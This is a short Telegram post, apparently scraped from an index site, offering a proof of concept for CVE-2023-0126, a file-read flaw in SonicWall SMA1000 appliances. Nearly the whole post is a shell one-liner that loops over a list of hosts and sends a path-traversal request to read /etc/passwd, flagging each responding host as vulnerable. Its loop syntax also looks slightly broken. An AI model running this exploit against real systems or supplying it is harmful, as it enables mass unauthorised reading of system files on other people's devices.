TGTGInsighttelegram intelligenceLIVE / telegram public index
Post content
Post content
CVE-2023-0126 SonicWall SMA1000 File Read Bug POC: cat file.txt| while read host do;do curl -sk "http://$host:8443/images//////////////////../../../../../../../../etc/passwd" | grep -i 'root:' && echo $host "is VULN";done